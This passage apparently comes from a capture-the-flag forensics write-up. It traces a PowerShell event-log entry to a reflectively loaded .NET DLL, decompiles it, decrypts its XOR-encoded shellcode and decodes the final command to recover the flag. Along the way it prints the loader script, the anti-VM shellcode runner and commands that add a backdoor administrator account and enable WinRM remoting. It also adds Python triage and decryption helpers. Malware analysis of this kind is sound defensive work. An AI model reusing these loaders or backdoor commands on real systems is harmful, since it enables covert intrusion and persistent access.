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")
$asm = [Reflection.Assembly]::Load($bytes)
$method = $asm.GetType("SecurityUpdate.Updater")
$method::run()</Data>
<Data Name="ScriptBlockId">6b8df088-c8ee-4b5c-82a0-bc8b26234057</Data>
<Data Name="Path"></Data>
</EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">40961</EventID>
<Version>1</Version>
<Level>4</Level>
<Task>4</Task>
<Opcode>1</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-03-13 03:16:36.025349"></TimeCreated>
<EventRecordID>118</EventRecordID>
<Correlation ActivityID="{2395a691-55a5-0000-10ab-9523a555d901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="3304" ThreadID="4248"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>Galax-35</Computer>
<Security UserID="S-1-5-21-3061737852-3666381533-1918146786-1001"></Security>
</System>
<EventData></EventData>
</Event>
...
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-03-13 03:46:01.889885"></TimeCreated>
<EventRecordID>157</EventRecordID>
<Correlation ActivityID="{0cf60e1a-55a9-0003-f821-f60ca955d901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="4928" ThreadID="3720"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>Galax-35</Computer>
<Security UserID="S-1-5-21-3061737852-3666381533-1918146786-1001"></Security>
</System>
<EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">
$bytes = [System.Convert]::FromBase64String("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")
$asm = [Reflection.Assembly]::Load($bytes)
$method = $asm.GetType("SecurityUpdate.Updater")
$method::run()</Data>
<Data Name="ScriptBlockId">d45f364b-b672-4403-b50d-a719c995fbbb</Data>
<Data Name="Path"></Data>
</EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">40961</EventID>
<Version>1</Version>
<Level>4</Level>
<Task>4</Task>
<Opcode>1</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-03-15 18:54:57.946825"></TimeCreated>
<EventRecordID>158</EventRecordID>
<Correlation ActivityID="{8dd049f6-57ba-0003-6b5a-d08dba57d901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="4288" ThreadID="2928"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>Galax-35</Computer>
<Security UserID="S-1-5-18"></Security>
</System>
<EventData></EventData>
</Event>
...
</Events>
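As an added example (my own code, not part of the original writeup), the following Python script automates the triage just done by hand over the evtx_dump.py output: it keeps only EventID 4104 script-block events, pulls out any FromBase64String("...") argument, checks whether the decoded blob starts with an MZ header, and flags blocks that combine that with [Reflection.Assembly]::Load. It also decodes -EncodedCommand arguments as UTF-16LE, which a plain base64 -d does not do. The XML embedded in it is constructed in the shape of the dump above: the first event reuses the Galax-35 record, timestamp and ScriptBlockId from the log but only the first 12 bytes of the DLL's Base64, the second event is a made-up launcher with an -EncodedCommand argument, and the third is a 40961 engine-start event that the filter has to skip.

```python
import base64
import re
import xml.etree.ElementTree as ET

EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
B64_ARG = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=]+)"\s*\)')
ENC_CMD = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries UTF-16LE text; a bare base64 -d leaves a NUL after every character."""
    return base64.b64decode(b64).decode("utf-16le")


def classify_blob(blob: bytes) -> str:
    """Cheap header check on a decoded blob; MZ means a PE image is being loaded from memory."""
    return "PE (MZ header)" if blob[:2] == b"MZ" else "unknown"


def triage_script_blocks(xml_text: str) -> list[dict]:
    """Keep the 4104 script-block events from an evtx_dump.py XML dump and flag in-memory loaders."""
    root = ET.fromstring(xml_text)
    findings = []
    for ev in root.iterfind("e:Event", EVT_NS):
        if ev.findtext("e:System/e:EventID", namespaces=EVT_NS) != "4104":
            continue  # 40961 engine-start records and others carry no script text
        data = {d.get("Name"): (d.text or "") for d in ev.iterfind("e:EventData/e:Data", EVT_NS)}
        script = data.get("ScriptBlockText", "")
        finding = {
            "time": ev.find("e:System/e:TimeCreated", EVT_NS).get("SystemTime"),
            "computer": ev.findtext("e:System/e:Computer", namespaces=EVT_NS),
            "script_block_id": data.get("ScriptBlockId"),
            "reflective_load": "Reflection.Assembly" in script and "::Load(" in script,
            "blobs": [],
            "encoded_commands": [],
        }
        for b64 in B64_ARG.findall(script):
            blob = base64.b64decode(b64)
            finding["blobs"].append({"size": len(blob), "kind": classify_blob(blob)})
        for b64 in ENC_CMD.findall(script):
            finding["encoded_commands"].append(decode_encoded_command(b64))
        # The pattern from this case: a PE handed to Assembly.Load straight from a Base64 literal.
        finding["suspicious"] = finding["reflective_load"] and any(
            b["kind"].startswith("PE") for b in finding["blobs"])
        findings.append(finding)
    return findings


# Constructed sample in the shape of the evtx_dump.py output. "TVqQAAMAAAAEAAAA" is only the
# first 16 Base64 characters of the DLL from the log (12 bytes, enough to show the MZ header);
# the second event and its encoded command are made up for this example.
SAMPLE_ENC = base64.b64encode("Get-Date".encode("utf-16le")).decode()
SAMPLE_XML = f"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell"></Provider>
<EventID Qualifiers="">4104</EventID>
<TimeCreated SystemTime="2023-03-13 02:43:07.168322"></TimeCreated>
<Computer>Galax-35</Computer>
</System>
<EventData><Data Name="ScriptBlockText">
$bytes = [System.Convert]::FromBase64String("TVqQAAMAAAAEAAAA")
$asm = [Reflection.Assembly]::Load($bytes)
$method = $asm.GetType("SecurityUpdate.Updater")
$method::run()</Data>
<Data Name="ScriptBlockId">6b8df088-c8ee-4b5c-82a0-bc8b26234057</Data>
</EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell"></Provider>
<EventID Qualifiers="">4104</EventID>
<TimeCreated SystemTime="2023-03-15 18:55:00.000000"></TimeCreated>
<Computer>Galax-35</Computer>
</System>
<EventData><Data Name="ScriptBlockText">powershell.exe -WindowStyle Hidden -NoProfile -EncodedCommand {SAMPLE_ENC}</Data>
<Data Name="ScriptBlockId">00000000-0000-0000-0000-000000000001</Data>
</EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell"></Provider>
<EventID Qualifiers="">40961</EventID>
<TimeCreated SystemTime="2023-03-15 18:54:57.946825"></TimeCreated>
<Computer>Galax-35</Computer>
</System>
<EventData></EventData>
</Event>
</Events>"""

if __name__ == "__main__":
    for f in triage_script_blocks(SAMPLE_XML):
        print(f["time"], f["computer"], f["script_block_id"], "SUSPICIOUS" if f["suspicious"] else "ok")
        print("  blobs:", f["blobs"], " encoded:", f["encoded_commands"])
```

On a real dump, feed the whole file to triage_script_blocks and sort the findings by time; the 4104 records are what put the loader on a timeline here, while the 40961 records only tell you when an engine started.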
We have the same setup with a Base64-encoded string, so we do the same thing:
$ echo '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' | base64 -d > malware
$ file malware
malware: PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
$ mv malware malware.dll
We have another DLL, but it is different from the previous one:
$ md5sum malware malware.dll
a9b7ff8d6f86fe44886627a030514b18 malware
a0391305149087fcf5e121ebe1c3aff6 malware.dll
$ mv malware malware2.dll
Let's decompile it again:
// Warning: Some assembly references could not be resolved automatically. This might lead to incorrect decompilation of some parts,
// for ex. property getter/setter access. To get optimal decompilation results, please manually add the missing references to the list of loaded assemblies.
// SecurityUpdate.Updater
using System;
using System.Management;
using System.Runtime.InteropServices;
using SecurityUpdate;
internal class Updater
{
private delegate void ShellcodeDelegate();
public enum MemoryProtection : uint
{
PAGE_EXECUTE = 16u,
PAGE_EXECUTE_READ = 32u,
PAGE_EXECUTE_READWRITE = 64u,
PAGE_EXECUTE_WRITECOPY = 128u,
PAGE_NOACCESS = 1u,
PAGE_READONLY = 2u,
PAGE_READWRITE = 4u,
PAGE_WRITECOPY = 8u,
PAGE_GUARD = 256u,
PAGE_NOCACHE = 512u,
PAGE_WRITECOMBINE = 1024u
}
private static byte[] shellcode = new byte[1147]
{
66, 124, 39, 241, 158, 115, 76, 22, 18, 179,
74, 69, 231, 155, 243, 86, 152, 191, 38, 26,
216, 189, 27, 226, 66, 106, 162, 109, 114, 190,
// ...
203, 102, 92, 138, 154, 140, 136, 131, 236, 15,
167, 119, 48, 189, 12, 224, 232
};
private static byte[] key = new byte[32]
{
190, 148, 165, 241, 158, 115, 44, 159, 247, 130,
138, 33, 108, 203, 195, 221, 202, 179, 173, 72,
204, 54, 105, 202, 77, 221, 232, 75, 67, 65,
42, 201
};
public unsafe static void Run()
{
//IL_0008: Unknown result type (might be due to invalid IL or missing references)
//IL_000e: Expected O, but got Unknown
//IL_0027: Unknown result type (might be due to invalid IL or missing references)
//IL_002d: Expected O, but got Unknown
bool flag = false;
ManagementObjectSearcher val = new ManagementObjectSearcher("SELECT * FROM Win32_ComputerSystem");
try
{
ManagementObjectEnumerator enumerator = val.Get().GetEnumerator();
try
{
while (enumerator.MoveNext())
{
ManagementObject val2 = (ManagementObject)enumerator.get_Current();
string text = ((ManagementBaseObject)val2).get_Item("Manufacturer").ToString()!.ToLower();
if ((text == "microsoft corporation" && ((ManagementBaseObject)val2).get_Item("Model").ToString()!.ToUpperInvariant().Contains("VIRTUAL")) || text.Contains("vmware") || ((ManagementBaseObject)val2).get_Item("Model").ToString() == "VirtualBox")
{
flag = true;
break;
}
}
}
finally
{
((IDisposable)enumerator)?.Dispose();
}
}
finally
{
((IDisposable)val)?.Dispose();
}
if (!flag)
{
for (int i = 0; i < shellcode.Length; i++)
{
shellcode[i] = (byte)(shellcode[i] ^ key[i % 32]);
}
fixed (byte* ptr = shellcode)
{
IntPtr intPtr = (IntPtr)ptr;
VirtualProtect(intPtr, (UIntPtr)(ulong)shellcode.Length, MemoryProtection.PAGE_EXECUTE_READWRITE, out var _);
ShellcodeDelegate shellcodeDelegate = (ShellcodeDelegate)Marshal.GetDelegateForFunctionPointer(intPtr, typeof(ShellcodeDelegate));
shellcodeDelegate();
}
}
}
[DllImport("kernel32.dll")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, MemoryProtection flNewProtect, out MemoryProtection lpflOldProtect);
}
In this program there is a large shellcode byte array that is XOR-encrypted with a key byte array. Let's use Python to decrypt it:
$ python3 -q
>>> from pwn import xor
>>>
>>> shellcode = bytes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
>>> key = bytes((190, 148, 165, 241, 158, 115, 44, 159, 247, 130, 138, 33, 108, 203, 195, 221, 202, 179, 173, 72, 204, 54, 105, 202, 77, 221, 232, 75, 67, 65, 42, 201))
>>>
>>> xor(shellcode, key)
b'\xfc\xe8\x82\x00\x00\x00`\x89\xe51\xc0d\x8bP0\x8bR\x0c\x8bR\x14\x8br(\x0f\xb7J&1\xff\xac<a|\x02, \xc1\xcf\r\x01\xc7\xe2\xf2RW\x8bR\x10\x8bJ<\x8bL\x11x\xe3H\x01\xd1Q\x8bY \x01\xd3\x8bI\x18\xe3:I\x8b4\x8b\x01\xd61\xff\xac\xc1\xcf\r\x01\xc78\xe0u\xf6\x03}\xf8;}$u\xe4X\x8bX$\x01\xd3f\x8b\x0cK\x8bX\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89D$$[[aYZQ\xff\xe0__Z\x8b\x12\xeb\x8d]j\x01\x8d\x85\xb2\x00\x00\x00Ph1\x8bo\x87\xff\xd5\xbb\xf0\xb5\xa2Vh\xa6\x95\xbd\x9d\xff\xd5<\x06|\n\x80\xfb\xe0u\x05\xbbG\x13roj\x00S\xff\xd5powershell.exe -WindowStyle Hidden -NoProfile -EncodedCommand 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\x00'
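As an added example (not from the writeup), here is a standalone Python version of the same decryption that does not depend on pwntools: it parses the byte[] initializers straight out of the decompiled C# text, applies the same shellcode[i] ^ key[i % 32] loop as Updater.Run(), and runs a strings-style scan over the result to surface the trailing command. The key and the first 30 ciphertext bytes are the ones printed in the decompilation above; the rest of the sample array is constructed (a placeholder command XORed with the same key), since the full 1147-byte listing is elided on the page. The parser also refuses a listing whose byte count does not match the declared length, which is what happens if you paste the abbreviated // ... listing as is.

```python
import re

# Key byte array as printed in the decompiled Updater class above (32 bytes, from the page).
KEY = bytes((190, 148, 165, 241, 158, 115, 44, 159, 247, 130,
             138, 33, 108, 203, 195, 221, 202, 179, 173, 72,
             204, 54, 105, 202, 77, 221, 232, 75, 67, 65,
             42, 201))

# First 30 encrypted shellcode bytes, also from the decompiled listing.
SHELLCODE_PREFIX = bytes((66, 124, 39, 241, 158, 115, 76, 22, 18, 179,
                          74, 69, 231, 155, 243, 86, 152, 191, 38, 26,
                          216, 189, 27, 226, 66, 106, 162, 109, 114, 190))


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: the shellcode[i] ^ key[i % 32] loop from Updater.Run()."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def parse_csharp_byte_array(source: str, name: str) -> bytes:
    """Extract `byte[] <name> = new byte[N] { ... };` from decompiled C# text."""
    pattern = re.compile(
        r"byte\[\]\s+" + re.escape(name) + r"\s*=\s*new\s+byte\[(\d+)\]\s*\{(.*?)\}\s*;",
        re.DOTALL,
    )
    match = pattern.search(source)
    if match is None:
        raise ValueError(f"array {name!r} not found")
    declared = int(match.group(1))
    body = re.sub(r"//[^\n]*", "", match.group(2))  # drop `// ...` style comments
    values = [int(tok) for tok in re.findall(r"\d+", body)]
    if any(v > 255 for v in values):
        raise ValueError(f"{name}: value out of byte range")
    if len(values) != declared:
        # Happens with an abbreviated decompiler listing; the array must be copied in full.
        raise ValueError(f"{name}: declared {declared} bytes but listing has {len(values)}")
    return bytes(values)


def extract_strings(data: bytes, min_len: int = 8) -> list[str]:
    """Printable-ASCII runs of at least min_len bytes, like the `strings` tool."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def decrypt_from_source(source: str) -> tuple[bytes, list[str]]:
    """Parse both arrays, decrypt, and return (plaintext, printable strings found in it)."""
    shellcode = parse_csharp_byte_array(source, "shellcode")
    key = parse_csharp_byte_array(source, "key")
    plain = xor_with_key(shellcode, key)
    return plain, extract_strings(plain)


def format_csharp_byte_array(name: str, data: bytes) -> str:
    """Render a byte array the way the decompiler prints it (10 values per row)."""
    rows = [", ".join(str(b) for b in data[i:i + 10]) for i in range(0, len(data), 10)]
    header = f"private static byte[] {name} = new byte[{len(data)}]"
    return header + "\n{\n" + ",\n".join(rows) + "\n};"


# Constructed sample: the real 30-byte prefix followed by a made-up tail (a placeholder command
# XORed with the same key), rendered as a C# listing so the parser has something to work on.
CONSTRUCTED_TAIL = (b"\xff\xd5powershell.exe -WindowStyle Hidden -NoProfile "
                    b"-EncodedCommand <ENCODED-COMMAND-PLACEHOLDER>\x00")
SAMPLE_PLAIN = xor_with_key(SHELLCODE_PREFIX, KEY) + CONSTRUCTED_TAIL
SAMPLE_SOURCE = (
    "internal class Updater\n{\n"
    + format_csharp_byte_array("shellcode", xor_with_key(SAMPLE_PLAIN, KEY)) + "\n"
    + format_csharp_byte_array("key", KEY) + "\n}\n"
)

if __name__ == "__main__":
    plain, found = decrypt_from_source(SAMPLE_SOURCE)
    print(plain[:16].hex(" "))  # starts fc e8 82 00 00 00 60 89 e5 ..., as in the pwntools output
    for s in found:
        print(s)
```

Against the real listing you would replace SAMPLE_SOURCE with the text copied from dnSpy or ILSpy; the declared-length check then guarantees you did not lose rows in the copy before trusting the decrypted bytes.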
The decrypted shellcode tries to run a PowerShell command, which appears at the end:
powershell.exe -WindowStyle Hidden -NoProfile -EncodedCommand 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
Flag
Now we decode the command:
$ echo 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 | base64 -d
$password = ConvertTo-SecureString "Sup3rS3cur3P@5sW0rd!!" -AsPlainText -Force
New-LocalUser "Anubis" -Password $password -Description "HTB{wsl_ox1d4t10n_4nd_rusty_m3m0ry_4rt1f4cts!!}"
Add-LocalGroupMember -Group "Administrators" -Member "Anubis"
Enable-PSRemoting -Force
Start-Service WinRM
Set-Service WinRM -StartupType Automatic
And finally, we have the flag!